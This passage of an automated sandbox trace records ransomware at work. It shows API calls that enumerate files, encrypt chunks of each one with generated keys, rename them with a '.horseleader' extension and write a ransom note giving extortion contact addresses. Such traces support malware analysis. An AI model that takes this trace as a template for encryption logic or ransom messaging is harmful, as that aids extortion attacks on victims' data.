Shared\\PROOF\\MSWDS_ES.LEX.horseleader") returned 81 [0245.469] MoveFileW 
(lpExistingFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\PROOF\\MSWDS_ES.LEX" (normalized: "c:\\program files\\common files\\microsoft shared\\proof\\mswds_es.lex"), lpNewFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\PROOF\\MSWDS_ES.LEX.horseleader" (normalized: "c:\\program files\\common files\\microsoft shared\\proof\\mswds_es.lex.horseleader")) returned 1 [0245.470] GetProcessHeap () returned 0x780000 [0245.470] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7e2960 | out: hHeap=0x780000) returned 1 [0245.470] FindNextFileW (in: hFindFile=0x7c6860, lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xcf3c9300, ftCreationTime.dwHighDateTime=0x1bdf5d3, ftLastAccessTime.dwLowDateTime=0x78ced70, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0xcf3c9300, ftLastWriteTime.dwHighDateTime=0x1bdf5d3, nFileSizeHigh=0x0, nFileSizeLow=0x482ef, dwReserved0=0xfb834915, dwReserved1=0xd3dda4fd, cFileName="MSWDS_FR.LEX", cAlternateFileName="")) returned 1 [0245.470] lstrcmpiW (lpString1="MSWDS_FR.LEX", lpString2="Windows") returned -1 [0245.470] wnsprintfW (in: pszDest=0x7e1110, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\PROOF\\MSWDS_FR.LEX") returned 69 [0245.471] StrStrIW (lpFirst="MSWDS_FR.LEX", lpSrch=".horseleader") returned 0x0 [0245.471] lstrcmpW (lpString1="MSWDS_FR.LEX", lpString2="#Decrypt#.txt") returned 1 [0245.471] lstrcmpW (lpString1="MSWDS_FR.LEX", lpString2="_uninstalling_.png") returned 1 [0245.471] lstrlenW (lpString=".testttjffg") returned 11 [0245.471] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\PROOF\\MSWDS_FR.LEX", lpSrch=".testttjffg") returned 0x0 [0245.471] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aed10 | out: pbBuffer=0x32aed10) returned 1 [0245.471] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, 
dwFlags=0x0, pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x24, dwBufLen=0x80 | out: pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x80) returned 1 [0245.471] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\PROOF\\MSWDS_FR.LEX" (normalized: "c:\\program files\\common files\\microsoft shared\\proof\\mswds_fr.lex"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x158 [0245.472] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\PROOF\\MSWDS_FR.LEX") returned 69 [0245.472] StrStrW (lpFirst="MSWDS_FR.LEX", lpSrch=".txt") returned 0x0 [0245.472] GetFileSizeEx (in: hFile=0x158, lpFileSize=0x32aedd0 | out: lpFileSize=0x32aedd0*=295663) returned 1 [0245.472] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0245.472] ReadFile (in: hFile=0x158, lpBuffer=0x32a9d10, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesRead=0x32aedf4*=0x5000, lpOverlapped=0x0) returned 1 [0245.475] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0245.475] WriteFile (in: hFile=0x158, lpBuffer=0x32a9d10*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesWritten=0x32aedf4*=0x5000, lpOverlapped=0x0) returned 1 [0245.475] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x21977, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0245.476] ReadFile (in: hFile=0x158, lpBuffer=0x32a9d10, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesRead=0x32aedf4*=0x5000, lpOverlapped=0x0) returned 1 [0245.477] 
SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0245.477] WriteFile (in: hFile=0x158, lpBuffer=0x32a9d10*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesWritten=0x32aedf4*=0x5000, lpOverlapped=0x0) returned 1 [0245.478] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x432ef, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0245.478] ReadFile (in: hFile=0x158, lpBuffer=0x32a9d10, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesRead=0x32aedf4*=0x5000, lpOverlapped=0x0) returned 1 [0245.481] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0245.481] WriteFile (in: hFile=0x158, lpBuffer=0x32a9d10*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesWritten=0x32aedf4*=0x5000, lpOverlapped=0x0) returned 1 [0245.481] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0245.481] WriteFile (in: hFile=0x158, lpBuffer=0x32aedc8*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32aedc8*, lpNumberOfBytesWritten=0x32aedf4*=0x4, lpOverlapped=0x0) returned 1 [0245.481] WriteFile (in: hFile=0x158, lpBuffer=0x32aed10*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32aed10*, lpNumberOfBytesWritten=0x32aedf4*=0x80, lpOverlapped=0x0) returned 1 [0245.481] CloseHandle (hObject=0x158) returned 1 [0245.481] GetProcessHeap () returned 0x780000 [0245.481] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7e2960 
[0245.481] wnsprintfW (in: pszDest=0x7e2960, cchDest=1024, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\PROOF\\MSWDS_FR.LEX.horseleader") returned 81 [0245.482] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\PROOF\\MSWDS_FR.LEX" (normalized: "c:\\program files\\common files\\microsoft shared\\proof\\mswds_fr.lex"), lpNewFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\PROOF\\MSWDS_FR.LEX.horseleader" (normalized: "c:\\program files\\common files\\microsoft shared\\proof\\mswds_fr.lex.horseleader")) returned 1 [0245.482] GetProcessHeap () returned 0x780000 [0245.482] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7e2960 | out: hHeap=0x780000) returned 1 [0245.482] FindNextFileW (in: hFindFile=0x7c6860, lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xcf3c9300, ftCreationTime.dwHighDateTime=0x1bdf5d3, ftLastAccessTime.dwLowDateTime=0x78ced70, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0xcf3c9300, ftLastWriteTime.dwHighDateTime=0x1bdf5d3, nFileSizeHigh=0x0, nFileSizeLow=0x482ef, dwReserved0=0xfb834915, dwReserved1=0xd3dda4fd, cFileName="MSWDS_FR.LEX", cAlternateFileName="")) returned 0 [0245.483] FindClose (in: hFindFile=0x7c6860 | out: hFindFile=0x7c6860) returned 1 [0245.483] wnsprintfW (in: pszDest=0x7e1110, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\PROOF\\#Decrypt#.txt") returned 70 [0245.483] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\PROOF\\#Decrypt#.txt" (normalized: "c:\\program files\\common files\\microsoft shared\\proof\\#decrypt#.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x21c [0245.483] lstrlenA (lpString="All your files have been 
ENCRYPTED!!!\r\nWrite to our ICQ @Horseleader\r\nOr contact us via jabber - horseleader@xmpp.jp\r\nJabber client installation instructions:\r\nDownload the jabber (Pidgin) client from https://pidgin.im/download/windows/ \r\n\r\nAfter installation, the Pidgin client will prompt you to create a new account. \r\nClick - Add\r\nIn the -Protocol field, select XMPP \r\nIn -Username - come up with any name \r\nIn the field -domain - enter any jabber-server, there are a lot of them, for example - exploit.im \r\nCreate a password\r\nAt the bottom, put a tick -Create account \r\nClick add \r\nIf you selected -domain - exploit.im, then a new window should appear in which you will need to re-enter your data: \r\nUser \r\npassword \r\nYou will need to follow the link to the captcha (there you will see the characters that you need to enter in the field below) \r\nIf you don't understand our Pidgin client installation instructions, you can find many installation tutorials on youtube - https://www.youtube.com/results?search_query=pidgin+jabber+install \r\nIf you have not received a response from us then we may have technical problems and please write to us using Jaber here bigbosshorse@xmpp.jp or on icq \r\nAttention!\r\nDo not rename encrypted files. \r\nDo not try to decrypt your data using third party software, it may cause permanent data loss. \r\nDecryption of your files with the help of third parties may cause increased price (they add their fee to our) or you can become a victim of a scam. 
\r\ntell your unique ID\r\n") returned 1508 [0245.483] WriteFile (in: hFile=0x21c, lpBuffer=0xb41ca0*, nNumberOfBytesToWrite=0x5e4, lpNumberOfBytesWritten=0x32aee10, lpOverlapped=0x0 | out: lpBuffer=0xb41ca0*, lpNumberOfBytesWritten=0x32aee10*=0x5e4, lpOverlapped=0x0) returned 1 [0245.485] lstrlenA (lpString="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") returned 1368 [0245.485] WriteFile (in: hFile=0x21c, lpBuffer=0x7d1740*, nNumberOfBytesToWrite=0x558, lpNumberOfBytesWritten=0x32aee10, lpOverlapped=0x0 | out: lpBuffer=0x7d1740*, lpNumberOfBytesWritten=0x32aee10*=0x558, lpOverlapped=0x0) returned 1 [0245.485] CloseHandle (hObject=0x21c) returned 1 [0245.485] GetProcessHeap () returned 0x780000 [0245.485] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7e1110 | out: hHeap=0x780000) returned 1 [0245.485] FindNextFileW (in: hFindFile=0x7c67a0, lpFindFileData=0x32af090 | out: lpFindFileData=0x32af090*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xeed123f0, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xd5807780, ftLastAccessTime.dwHighDateTime=0x1d305eb, ftLastWriteTime.dwLowDateTime=0xd5807780, ftLastWriteTime.dwHighDateTime=0x1d305eb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xdded3805, dwReserved1=0xda7b4a6d, cFileName="Smart Tag", cAlternateFileName="SMARTT~1")) returned 1 [0245.485] lstrcmpiW (lpString1="Smart Tag", lpString2="Windows") returned -1 [0245.485] wnsprintfW (in: pszDest=0x79a620, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag") returned 60 [0245.485] lstrcmpW (lpString1="Smart Tag", lpString2=".") returned 1 [0245.485] lstrcmpW (lpString1="Smart Tag", lpString2="..") returned 1 [0245.485] lstrcmpW (lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned -1 [0245.485] GetProcessHeap () returned 0x780000 [0245.485] RtlAllocateHeap 
(HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7e1110 [0245.485] wnsprintfW (in: pszDest=0x7e1110, cchDest=1024, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\*") returned 62 [0245.485] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\*", lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xeed123f0, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xd5807780, ftLastAccessTime.dwHighDateTime=0x1d305eb, ftLastWriteTime.dwLowDateTime=0xd5807780, ftLastWriteTime.dwHighDateTime=0x1d305eb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xfb834915, dwReserved1=0xd3dda4fd, cFileName=".", cAlternateFileName="")) returned 0x7c6860 [0245.488] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0245.488] wnsprintfW (in: pszDest=0x7e1110, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\.") returned 62 [0245.488] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0245.488] FindNextFileW (in: hFindFile=0x7c6860, lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xeed123f0, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xd5807780, ftLastAccessTime.dwHighDateTime=0x1d305eb, ftLastWriteTime.dwLowDateTime=0xd5807780, ftLastWriteTime.dwHighDateTime=0x1d305eb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xfb834915, dwReserved1=0xd3dda4fd, cFileName="..", cAlternateFileName="")) returned 1 [0245.488] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0245.489] wnsprintfW (in: pszDest=0x7e1110, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\..") returned 63 [0245.489] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0245.489] lstrcmpW 
(lpString1="..", lpString2="..") returned 0 [0245.489] FindNextFileW (in: hFindFile=0x7c6860, lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xeee1cd90, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xef058230, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xef058230, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xfb834915, dwReserved1=0xd3dda4fd, cFileName="1033", cAlternateFileName="")) returned 1 [0245.489] lstrcmpiW (lpString1="1033", lpString2="Windows") returned -1 [0245.489] wnsprintfW (in: pszDest=0x7e1110, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\1033") returned 65 [0245.489] lstrcmpW (lpString1="1033", lpString2=".") returned 1 [0245.489] lstrcmpW (lpString1="1033", lpString2="..") returned 1 [0245.489] lstrcmpW (lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\1033", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned -1 [0245.489] GetProcessHeap () returned 0x780000 [0245.489] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7e2960 [0245.489] wnsprintfW (in: pszDest=0x7e2960, cchDest=1024, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\1033\\*") returned 67 [0245.489] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\1033\\*", lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xeee1cd90, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xef058230, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xef058230, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x3d46b48d, dwReserved1=0x38a709c6, cFileName=".", 
cAlternateFileName="")) returned 0x7c6760 [0245.491] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0245.491] wnsprintfW (in: pszDest=0x7e2960, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\1033\\.") returned 67 [0245.491] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0245.491] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xeee1cd90, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xef058230, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xef058230, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x3d46b48d, dwReserved1=0x38a709c6, cFileName="..", cAlternateFileName="")) returned 1 [0245.491] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0245.491] wnsprintfW (in: pszDest=0x7e2960, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\1033\\..") returned 68 [0245.491] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0245.491] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0245.491] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc52bb100, ftCreationTime.dwHighDateTime=0x1ca6185, ftLastAccessTime.dwLowDateTime=0xeee1cd90, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xc52bb100, ftLastWriteTime.dwHighDateTime=0x1ca6185, nFileSizeHigh=0x0, nFileSizeLow=0x2cc7, dwReserved0=0x3d46b48d, dwReserved1=0x38a709c6, cFileName="MCABOUT.HTM", cAlternateFileName="")) returned 1 [0245.491] lstrcmpiW (lpString1="MCABOUT.HTM", lpString2="Windows") returned -1 [0245.491] wnsprintfW (in: pszDest=0x7e2960, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common 
Files\\Microsoft Shared\\Smart Tag\\1033\\MCABOUT.HTM") returned 77 [0245.491] StrStrIW (lpFirst="MCABOUT.HTM", lpSrch=".horseleader") returned 0x0 [0245.491] lstrcmpW (lpString1="MCABOUT.HTM", lpString2="#Decrypt#.txt") returned 1 [0245.491] lstrcmpW (lpString1="MCABOUT.HTM", lpString2="_uninstalling_.png") returned 1 [0245.491] lstrlenW (lpString=".testttjffg") returned 11 [0245.491] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\1033\\MCABOUT.HTM", lpSrch=".testttjffg") returned 0x0 [0245.491] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aea98 | out: pbBuffer=0x32aea98) returned 1 [0245.492] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x24, dwBufLen=0x80 | out: pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x80) returned 1 [0245.492] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\1033\\MCABOUT.HTM" (normalized: "c:\\program files\\common files\\microsoft shared\\smart tag\\1033\\mcabout.htm"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a4 [0245.492] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\1033\\MCABOUT.HTM") returned 77 [0245.492] StrStrW (lpFirst="MCABOUT.HTM", lpSrch=".txt") returned 0x0 [0245.492] GetFileSizeEx (in: hFile=0x1a4, lpFileSize=0x32aeb58 | out: lpFileSize=0x32aeb58*=11463) returned 1 [0245.493] ReadFile (in: hFile=0x1a4, lpBuffer=0x32a9a98, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesRead=0x32aeb7c*=0x2cc7, lpOverlapped=0x0) returned 1 [0245.494] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0xffffd339, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0245.494] WriteFile (in: hFile=0x1a4, 
lpBuffer=0x32a9a98*, nNumberOfBytesToWrite=0x2cc7, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesWritten=0x32aeb7c*=0x2cc7, lpOverlapped=0x0) returned 1 [0245.495] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0245.495] WriteFile (in: hFile=0x1a4, lpBuffer=0x32aeb50*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32aeb50*, lpNumberOfBytesWritten=0x32aeb7c*=0x4, lpOverlapped=0x0) returned 1 [0245.495] WriteFile (in: hFile=0x1a4, lpBuffer=0x32aea98*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32aea98*, lpNumberOfBytesWritten=0x32aeb7c*=0x80, lpOverlapped=0x0) returned 1 [0245.495] CloseHandle (hObject=0x1a4) returned 1 [0245.495] GetProcessHeap () returned 0x780000 [0245.495] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7e31a8 [0245.495] wnsprintfW (in: pszDest=0x7e31a8, cchDest=1024, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\1033\\MCABOUT.HTM.horseleader") returned 89 [0245.495] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\1033\\MCABOUT.HTM" (normalized: "c:\\program files\\common files\\microsoft shared\\smart tag\\1033\\mcabout.htm"), lpNewFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\1033\\MCABOUT.HTM.horseleader" (normalized: "c:\\program files\\common files\\microsoft shared\\smart tag\\1033\\mcabout.htm.horseleader")) returned 1 [0245.496] GetProcessHeap () returned 0x780000 [0245.496] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7e31a8 | out: hHeap=0x780000) returned 1 [0245.496] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7b89b100, 
ftCreationTime.dwHighDateTime=0x1caac21, ftLastAccessTime.dwLowDateTime=0xef058230, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0x7b89b100, ftLastWriteTime.dwHighDateTime=0x1caac21, nFileSizeHigh=0x0, nFileSizeLow=0x4380, dwReserved0=0x3d46b48d, dwReserved1=0x38a709c6, cFileName="STINTL.DLL", cAlternateFileName="")) returned 1 [0245.496] lstrcmpiW (lpString1="STINTL.DLL", lpString2="Windows") returned -1 [0245.496] wnsprintfW (in: pszDest=0x7e2960, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\1033\\STINTL.DLL") returned 76 [0245.496] StrStrIW (lpFirst="STINTL.DLL", lpSrch=".horseleader") returned 0x0 [0245.496] lstrcmpW (lpString1="STINTL.DLL", lpString2="#Decrypt#.txt") returned 1 [0245.496] lstrcmpW (lpString1="STINTL.DLL", lpString2="_uninstalling_.png") returned 1 [0245.496] lstrlenW (lpString=".testttjffg") returned 11 [0245.496] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\1033\\STINTL.DLL", lpSrch=".testttjffg") returned 0x0 [0245.496] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aea98 | out: pbBuffer=0x32aea98) returned 1 [0245.496] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x24, dwBufLen=0x80 | out: pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x80) returned 1 [0245.497] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\1033\\STINTL.DLL" (normalized: "c:\\program files\\common files\\microsoft shared\\smart tag\\1033\\stintl.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a4 [0245.498] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\1033\\STINTL.DLL") returned 76 [0245.498] StrStrW (lpFirst="STINTL.DLL", lpSrch=".txt") returned 0x0 [0245.498] 
GetFileSizeEx (in: hFile=0x1a4, lpFileSize=0x32aeb58 | out: lpFileSize=0x32aeb58*=17280) returned 1 [0245.498] ReadFile (in: hFile=0x1a4, lpBuffer=0x32a9a98, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesRead=0x32aeb7c*=0x4380, lpOverlapped=0x0) returned 1 [0245.500] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0xffffbc80, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0245.500] WriteFile (in: hFile=0x1a4, lpBuffer=0x32a9a98*, nNumberOfBytesToWrite=0x4380, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesWritten=0x32aeb7c*=0x4380, lpOverlapped=0x0) returned 1 [0245.500] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0245.501] WriteFile (in: hFile=0x1a4, lpBuffer=0x32aeb50*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32aeb50*, lpNumberOfBytesWritten=0x32aeb7c*=0x4, lpOverlapped=0x0) returned 1 [0245.501] WriteFile (in: hFile=0x1a4, lpBuffer=0x32aea98*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32aea98*, lpNumberOfBytesWritten=0x32aeb7c*=0x80, lpOverlapped=0x0) returned 1 [0245.501] CloseHandle (hObject=0x1a4) returned 1 [0245.501] GetProcessHeap () returned 0x780000 [0245.501] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7e31a8 [0245.501] wnsprintfW (in: pszDest=0x7e31a8, cchDest=1024, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\1033\\STINTL.DLL.horseleader") returned 88 [0245.501] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\1033\\STINTL.DLL" (normalized: "c:\\program files\\common files\\microsoft shared\\smart tag\\1033\\stintl.dll"), 
